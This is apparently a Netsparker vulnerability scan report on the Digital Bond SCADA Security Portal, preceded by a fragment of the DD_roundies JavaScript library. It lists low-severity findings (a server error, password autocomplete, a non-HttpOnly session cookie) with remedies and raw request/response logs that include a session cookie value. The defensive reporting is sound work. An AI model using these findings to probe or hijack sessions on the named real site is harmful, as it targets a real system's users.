this.vmlBox.runtimeStyle.cssText = 'behavior:none; position:absolute; margin:0; padding:0; border:0; background:none;'; /* super important - if something accidentally matches this (you yourseld did this once, Drew), you'll get infinitely-created elements and a frozen browser! */
this.vmlBox.style.zIndex = thisStyle.zIndex;
this.vml = {'color':true, 'image':true, 'stroke':true};
for (var v in this.vml) {
this.vml[v] = document.createElement(lib.ns + ':shape');
this.vml[v].filler = document.createElement(lib.ns + ':fill');
this.vml[v].appendChild(this.vml[v].filler);
this.vml[v].stroked = false;
this.vml[v].style.position = 'absolute';
this.vml[v].style.zIndex = thisStyle.zIndex;
this.vml[v].coordorigin = '1,1';
this.vmlBox.appendChild(this.vml[v]);
}
this.vml.image.fillcolor = 'none';
this.vml.image.filler.type = 'tile';
this.parentNode.insertBefore(this.vmlBox, this);
this.isImg = false;
if (this.nodeName == 'IMG') {
this.isImg = true;
this.style.visibility = 'hidden';
}
setTimeout(function() {
lib.applyVML(self);
}, 1);
}
};
try {
document.execCommand("BackgroundImageCache", false, true);
} catch(err) {}
DD_roundies.IEversion();
DD_roundies.createVmlNameSpace();
DD_roundies.createVmlStyleSheet();
if (DD_roundies.IE8 && document.attachEvent && DD_roundies.querySelector) {
document.attachEvent('onreadystatechange', function() {
if (document.readyState == 'complete') {
var selectors = DD_roundies.selectorsToProcess;
var length = selectors.length;
var delayedCall = function(node, radii, index) {
setTimeout(function() {
DD_roundies.roundify.call(node, radii);
}, index*100);
};
for (var i=0; i<length; i++) {
var results = document.querySelectorAll(selectors[i].selector);
var rLength = results.length;
for (var r=0; r<rLength; r++) {
if (results[r].nodeName != 'INPUT') { /* IE8 doesn't like to do this to inputs yet */
delayedCall(results[r], selectors[i].radii, r);
}
}
}
}
});
}
Internal Server Error
Internal Server Error
1
TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Remedy
Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
|
- /wp-content/themes/atahualpa/
/wp-content/themes/atahualpa/ CONFIRMED |
Request
GET /wp-content/themes/atahualpa/ HTTP/1.1
Referer: https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=10
Cache-Control: max-age=7200
Expires: Tue, 19 Apr 2011 21:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 20
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=10
Cache-Control: max-age=7200
Expires: Tue, 19 Apr 2011 21:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 20
Auto Complete Enabled
Auto Complete Enabled
1
TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.Remedy
Add the attribute
autocomplete="off" to the form tag or to individual "input" fields.Actions to Take
- See the remedy for the solution.
- Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
- Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
|
- /wp-login.php
/wp-login.php CONFIRMED |
Identified Field Name
cimy_uef_wp_PASSWORD
Request
GET /wp-login.php?action=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,wordpress_test_cookie=WP+Cookie+check; path=/,wordpress_test_cookie=WP+Cookie+check; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 19 Apr 2011 19:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 2361
X-Type: backend
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <title>Digital Bond's SCADA Security Portal › Registration Form</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel='stylesheet' id='login-css' href='https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121' type='text/css' media='all' /><link rel='stylesheet' id='colors-fresh-css' href='https://www.digitalbond.com/wp-admin/css/colors-fresh.css?ver=20110121' type='text/css' media='all' /><script type='text/javascript' src='https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel='stylesheet' id='cimy_uef_register-css' href='https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/css/cimy_uef_register.css?ver=3.1.1' type='text/css' media='all' /> <style type="text/css">
#login h1 a {
background: url(http://www.digitalbond.com/wp-content/Cimy_User_Extra_Fields/digitalbond_logo_final_328.png) no-repeat top center;
background-position: center top;
width: 328px;
height: 165px;
text-indent: -9999px;
overflow: hidden;
padding-bottom: 15px;
display: block;
}
</style>
<meta name='robots' content='noindex,nofollow' /></head><body class="login"><div id="login"><h1><a href="http://wordpress.org/" title="Powered by WordPress">Digital Bond's SCADA Security Portal</a></h1><p class="message register">Register For This Site</p><form name="registerform" id="registerform" action="https://www.digitalbond.com/wp-login.php?action=register" method="post"> <p> <label>Username<br /> <input type="text" name="user_login" id="user_login" class="input" value="" size="20" tabindex="10" /></label> </p> <p> <label>E-mail<br /> <input type="text" name="user_email" id="user_email" class="input" value="" size="25" tabindex="20" /></label> </p><!-- Start code from Cimy User Extra Fields 2.0.3 Copyright (c) 2006-2011 Marco Cimmino http://www.marcocimmino.net/cimy-wordpress-plugins/cimy-user-extra-fields/--> <input type="hidden" name="cimy_post" value="1" /> <p id="cimy_uef_wp_p_field_1"> <label for="cimy_uef_wp_1">First name</label><input type="text" name="cimy_uef_wp_FIRSTNAME" id="cimy_uef_wp_1" class="cimy_uef_input_27" value="" maxlength="20" tabindex="21" /> </p> <p id="cimy_uef_wp_p_field_2"> <label for="cimy_uef_wp_2">Last name</label><input type="text" name="cimy_uef_wp_LASTNAME" id="cimy_uef_wp_2" class="cimy_uef_input_27" value="" maxlength="25" tabindex="22" /> </p> <p id="cimy_uef_wp_p_field_3"> <label for="cimy_uef_wp_3">Password</label><input type="password" name="cimy_uef_wp_PASSWORD" id="cimy_uef_wp_3" class="cimy_uef_input_27" value="" maxlength="16" tabindex="23" /> </p> <p id="cimy_uef_wp_p_field_4"> <label for="cimy_uef_wp_4">Password confirmation</label><input type="password" name="cimy_uef_wp_PASSWORD2" id="cimy_uef_wp_4" class="cimy_uef_input_27" value="" maxlength="16" tabindex="24" /> </p> <h2>Password_Tips</h2> <p id="cimy_uef_p_desc_7" class="desc"><br />Use your weak password on this site. Do not use one of your strong, important passwords because it will be sent in an email.
Registration is free of charge and you will not purchase anything with this account. </p> <p id="cimy_uef_p_field_7"> <input type="checkbox" name="cimy_uef_TIP" id="cimy_uef_7" class="cimy_uef_checkbox" value="1" tabindex="25" /><label class="cimy_uef_label_checkbox" for="cimy_uef_7"> </label><br /> </p> <p id="cimy_uef_p_field_1"> <label for="cimy_uef_1">Enter your company's name</label><input type="text" name="cimy_uef_COMPANY" id="cimy_uef_1" class="cimy_uef_input_27" value="" maxlength="63" tabindex="26" /> </p> <p id="cimy_uef_p_field_5"> <label for="cimy_uef_5">Enter your industry sector</label><input type="text" name="cimy_uef_SECTOR" id="cimy_uef_5" class="cimy_uef_input_27" value="" maxlength="63" tabindex="27" /> </p> <p id="cimy_uef_p_field_6"> <label for="cimy_uef_6">What country are you in?</label><input type="text" name="cimy_uef_COUNTRY" id="cimy_uef_6" class="cimy_uef_input_27" value="" maxlength="25" tabindex="28" /> </p> <div style="width: 278px; float: left; height: 80px; vertical-align: text-top;"> <img id="captcha" align="left" style="padding-right: 5px; border: 0" src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php" alt="CAPTCHA Image" /> <object type="application/x-shockwave-flash" data="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" height="19" width="19"><param name="movie" value="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" /></object> <br /><br /><br /><br /> <a align="right" tabindex="29" style="border-style: none" href="#" onclick="document.getElementById('captcha').src = 'https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php?' + Math.random(); return false"><img src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/images/refresh.gif" alt="Change image" border="0" onclick="this.blur()" align="bottom" /></a> </div> <div style="width: 278px; float: left; height: 50px; vertical-align: bottom; padding: 5px;"> Insert the code: <input type="text" name="securimage_response_field" size="10" maxlength="6" tabindex="30" /> </div><!-- End of code from Cimy User Extra Fields--> <p id="reg_passmail">A password will be e-mailed to you.</p> <br class="clear" /> <input type="hidden" name="redirect_to" value="" /> <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="Register" tabindex="100" /></p></form><p id="nav"><a href="https://www.digitalbond.com/wp-login.php">Log in</a> |<a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a></p></div><script type="text/javascript">try{document.getElementById('user_login').focus();}catch(e){}if(typeof wpOnload=='function')wpOnload();</script><p id="backtoblog"><a href="https://www.digitalbond.com/" title="Are you lost?">← Back to Digital Bond's SCADA Security Portal</a></p></body></html>
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,wordpress_test_cookie=WP+Cookie+check; path=/,wordpress_test_cookie=WP+Cookie+check; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 19 Apr 2011 19:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 2361
X-Type: backend
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <title>Digital Bond's SCADA Security Portal › Registration Form</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel='stylesheet' id='login-css' href='https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121' type='text/css' media='all' /><link rel='stylesheet' id='colors-fresh-css' href='https://www.digitalbond.com/wp-admin/css/colors-fresh.css?ver=20110121' type='text/css' media='all' /><script type='text/javascript' src='https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel='stylesheet' id='cimy_uef_register-css' href='https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/css/cimy_uef_register.css?ver=3.1.1' type='text/css' media='all' /> <style type="text/css">
#login h1 a {
background: url(http://www.digitalbond.com/wp-content/Cimy_User_Extra_Fields/digitalbond_logo_final_328.png) no-repeat top center;
background-position: center top;
width: 328px;
height: 165px;
text-indent: -9999px;
overflow: hidden;
padding-bottom: 15px;
display: block;
}
</style>
<meta name='robots' content='noindex,nofollow' /></head><body class="login"><div id="login"><h1><a href="http://wordpress.org/" title="Powered by WordPress">Digital Bond's SCADA Security Portal</a></h1><p class="message register">Register For This Site</p><form name="registerform" id="registerform" action="https://www.digitalbond.com/wp-login.php?action=register" method="post"> <p> <label>Username<br /> <input type="text" name="user_login" id="user_login" class="input" value="" size="20" tabindex="10" /></label> </p> <p> <label>E-mail<br /> <input type="text" name="user_email" id="user_email" class="input" value="" size="25" tabindex="20" /></label> </p><!-- Start code from Cimy User Extra Fields 2.0.3 Copyright (c) 2006-2011 Marco Cimmino http://www.marcocimmino.net/cimy-wordpress-plugins/cimy-user-extra-fields/--> <input type="hidden" name="cimy_post" value="1" /> <p id="cimy_uef_wp_p_field_1"> <label for="cimy_uef_wp_1">First name</label><input type="text" name="cimy_uef_wp_FIRSTNAME" id="cimy_uef_wp_1" class="cimy_uef_input_27" value="" maxlength="20" tabindex="21" /> </p> <p id="cimy_uef_wp_p_field_2"> <label for="cimy_uef_wp_2">Last name</label><input type="text" name="cimy_uef_wp_LASTNAME" id="cimy_uef_wp_2" class="cimy_uef_input_27" value="" maxlength="25" tabindex="22" /> </p> <p id="cimy_uef_wp_p_field_3"> <label for="cimy_uef_wp_3">Password</label><input type="password" name="cimy_uef_wp_PASSWORD" id="cimy_uef_wp_3" class="cimy_uef_input_27" value="" maxlength="16" tabindex="23" /> </p> <p id="cimy_uef_wp_p_field_4"> <label for="cimy_uef_wp_4">Password confirmation</label><input type="password" name="cimy_uef_wp_PASSWORD2" id="cimy_uef_wp_4" class="cimy_uef_input_27" value="" maxlength="16" tabindex="24" /> </p> <h2>Password_Tips</h2> <p id="cimy_uef_p_desc_7" class="desc"><br />Use your weak password on this site. Do not use one of your strong, important passwords because it will be sent in an email.
Registration is free of charge and you will not purchase anything with this account. </p> <p id="cimy_uef_p_field_7"> <input type="checkbox" name="cimy_uef_TIP" id="cimy_uef_7" class="cimy_uef_checkbox" value="1" tabindex="25" /><label class="cimy_uef_label_checkbox" for="cimy_uef_7"> </label><br /> </p> <p id="cimy_uef_p_field_1"> <label for="cimy_uef_1">Enter your company's name</label><input type="text" name="cimy_uef_COMPANY" id="cimy_uef_1" class="cimy_uef_input_27" value="" maxlength="63" tabindex="26" /> </p> <p id="cimy_uef_p_field_5"> <label for="cimy_uef_5">Enter your industry sector</label><input type="text" name="cimy_uef_SECTOR" id="cimy_uef_5" class="cimy_uef_input_27" value="" maxlength="63" tabindex="27" /> </p> <p id="cimy_uef_p_field_6"> <label for="cimy_uef_6">What country are you in?</label><input type="text" name="cimy_uef_COUNTRY" id="cimy_uef_6" class="cimy_uef_input_27" value="" maxlength="25" tabindex="28" /> </p> <div style="width: 278px; float: left; height: 80px; vertical-align: text-top;"> <img id="captcha" align="left" style="padding-right: 5px; border: 0" src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php" alt="CAPTCHA Image" /> <object type="application/x-shockwave-flash" data="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" height="19" width="19"><param name="movie" value="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" /></object> <br /><br /><br /><br /> <a align="right" tabindex="29" style="border-style: none" href="#" onclick="document.getElementById('captcha').src = 'https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php?' + Math.random(); return false"><img src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/images/refresh.gif" alt="Change image" border="0" onclick="this.blur()" align="bottom" /></a> </div> <div style="width: 278px; float: left; height: 50px; vertical-align: bottom; padding: 5px;"> Insert the code: <input type="text" name="securimage_response_field" size="10" maxlength="6" tabindex="30" /> </div><!-- End of code from Cimy User Extra Fields--> <p id="reg_passmail">A password will be e-mailed to you.</p> <br class="clear" /> <input type="hidden" name="redirect_to" value="" /> <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="Register" tabindex="100" /></p></form><p id="nav"><a href="https://www.digitalbond.com/wp-login.php">Log in</a> |<a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a></p></div><script type="text/javascript">try{document.getElementById('user_login').focus();}catch(e){}if(typeof wpOnload=='function')wpOnload();</script><p id="backtoblog"><a href="https://www.digitalbond.com/" title="Are you lost?">← Back to Digital Bond's SCADA Security Portal</a></p></body></html>
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
1
TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Remedy
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
External References
|
- /wp-login.php
/wp-login.php CONFIRMED |
Identified Cookie
PHPSESSID
Request
GET /wp-login.php?action=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,wordpress_test_cookie=WP+Cookie+check; path=/,wordpress_test_cookie=WP+Cookie+check; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 19 Apr 2011 19:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 2361
X-Type: backend
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <title>Digital Bond's SCADA Security Portal › Registration Form</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel='stylesheet' id='login-css' href='https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121' type='text/css' media='all' /><link rel='stylesheet' id='colors-fresh-css' href='https://www.digitalbond.com/wp-admin/css/colors-fresh.css?ver=20110121' type='text/css' media='all' /><script type='text/javascript' src='https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel='stylesheet' id='cimy_uef_register-css' href='https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/css/cimy_uef_register.css?ver=3.1.1' type='text/css' media='all' /> <style type="text/css">
#login h1 a {
background: url(http://www.digitalbond.com/wp-content/Cimy_User_Extra_Fields/digitalbond_logo_final_328.png) no-repeat top center;
background-position: center top;
width: 328px;
height: 165px;
text-indent: -9999px;
overflow: hidden;
padding-bottom: 15px;
display: block;
}
</style>
<meta name='robots' content='noindex,nofollow' /></head><body class="login"><div id="login"><h1><a href="http://wordpress.org/" title="Powered by WordPress">Digital Bond's SCADA Security Portal</a></h1><p class="message register">Register For This Site</p><form name="registerform" id="registerform" action="https://www.digitalbond.com/wp-login.php?action=register" method="post"> <p> <label>Username<br /> <input type="text" name="user_login" id="user_login" class="input" value="" size="20" tabindex="10" /></label> </p> <p> <label>E-mail<br /> <input type="text" name="user_email" id="user_email" class="input" value="" size="25" tabindex="20" /></label> </p><!-- Start code from Cimy User Extra Fields 2.0.3 Copyright (c) 2006-2011 Marco Cimmino http://www.marcocimmino.net/cimy-wordpress-plugins/cimy-user-extra-fields/--> <input type="hidden" name="cimy_post" value="1" /> <p id="cimy_uef_wp_p_field_1"> <label for="cimy_uef_wp_1">First name</label><input type="text" name="cimy_uef_wp_FIRSTNAME" id="cimy_uef_wp_1" class="cimy_uef_input_27" value="" maxlength="20" tabindex="21" /> </p> <p id="cimy_uef_wp_p_field_2"> <label for="cimy_uef_wp_2">Last name</label><input type="text" name="cimy_uef_wp_LASTNAME" id="cimy_uef_wp_2" class="cimy_uef_input_27" value="" maxlength="25" tabindex="22" /> </p> <p id="cimy_uef_wp_p_field_3"> <label for="cimy_uef_wp_3">Password</label><input type="password" name="cimy_uef_wp_PASSWORD" id="cimy_uef_wp_3" class="cimy_uef_input_27" value="" maxlength="16" tabindex="23" /> </p> <p id="cimy_uef_wp_p_field_4"> <label for="cimy_uef_wp_4">Password confirmation</label><input type="password" name="cimy_uef_wp_PASSWORD2" id="cimy_uef_wp_4" class="cimy_uef_input_27" value="" maxlength="16" tabindex="24" /> </p> <h2>Password_Tips</h2> <p id="cimy_uef_p_desc_7" class="desc"><br />Use your weak password on this site. Do not use one of your strong, important passwords because it will be sent in an email.
Registration is free of charge and you will not purchase anything with this account. </p> <p id="cimy_uef_p_field_7"> <input type="checkbox" name="cimy_uef_TIP" id="cimy_uef_7" class="cimy_uef_checkbox" value="1" tabindex="25" /><label class="cimy_uef_label_checkbox" for="cimy_uef_7"> </label><br /> </p> <p id="cimy_uef_p_field_1"> <label for="cimy_uef_1">Enter your company's name</label><input type="text" name="cimy_uef_COMPANY" id="cimy_uef_1" class="cimy_uef_input_27" value="" maxlength="63" tabindex="26" /> </p> <p id="cimy_uef_p_field_5"> <label for="cimy_uef_5">Enter your industry sector</label><input type="text" name="cimy_uef_SECTOR" id="cimy_uef_5" class="cimy_uef_input_27" value="" maxlength="63" tabindex="27" /> </p> <p id="cimy_uef_p_field_6"> <label for="cimy_uef_6">What country are you in?</label><input type="text" name="cimy_uef_COUNTRY" id="cimy_uef_6" class="cimy_uef_input_27" value="" maxlength="25" tabindex="28" /> </p> <div style="width: 278px; float: left; height: 80px; vertical-align: text-top;"> <img id="captcha" align="left" style="padding-right: 5px; border: 0" src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php" alt="CAPTCHA Image" /> <object type="application/x-shockwave-flash" data="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" height="19" width="19"><param name="movie" value="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" /></object> <br /><br /><br /><br /> <a align="right" tabindex="29" style="border-style: none" href="#" onclick="document.getElementById('captcha').src = 'https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php?' + Math.random(); return false"><img src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/images/refresh.gif" alt="Change image" border="0" onclick="this.blur()" align="bottom" /></a> </div> <div style="width: 278px; float: left; height: 50px; vertical-align: bottom; padding: 5px;"> Insert the code: <input type="text" name="securimage_response_field" size="10" maxlength="6" tabindex="30" /> </div><!-- End of code from Cimy User Extra Fields--> <p id="reg_passmail">A password will be e-mailed to you.</p> <br class="clear" /> <input type="hidden" name="redirect_to" value="" /> <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="Register" tabindex="100" /></p></form><p id="nav"><a href="https://www.digitalbond.com/wp-login.php">Log in</a> |<a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a></p></div><script type="text/javascript">try{document.getElementById('user_login').focus();}catch(e){}if(typeof wpOnload=='function')wpOnload();</script><p id="backtoblog"><a href="https://www.digitalbond.com/" title="Are you lost?">← Back to Digital Bond's SCADA Security Portal</a></p></body></html>
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,wordpress_test_cookie=WP+Cookie+check; path=/,wordpress_test_cookie=WP+Cookie+check; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 19 Apr 2011 19:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 2361
X-Type: backend
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <title>Digital Bond's SCADA Security Portal › Registration Form</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel='stylesheet' id='login-css' href='https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121' type='text/css' media='all' /><link rel='stylesheet' id='colors-fresh-css' href='https://www.digitalbond.com/wp-admin/css/colors-fresh.css?ver=20110121' type='text/css' media='all' /><script type='text/javascript' src='https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel='stylesheet' id='cimy_uef_register-css' href='https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/css/cimy_uef_register.css?ver=3.1.1' type='text/css' media='all' /> <style type="text/css">
#login h1 a {
background: url(http://www.digitalbond.com/wp-content/Cimy_User_Extra_Fields/digitalbond_logo_final_328.png) no-repeat top center;
background-position: center top;
width: 328px;
height: 165px;
text-indent: -9999px;
overflow: hidden;
padding-bottom: 15px;
display: block;
}
</style>
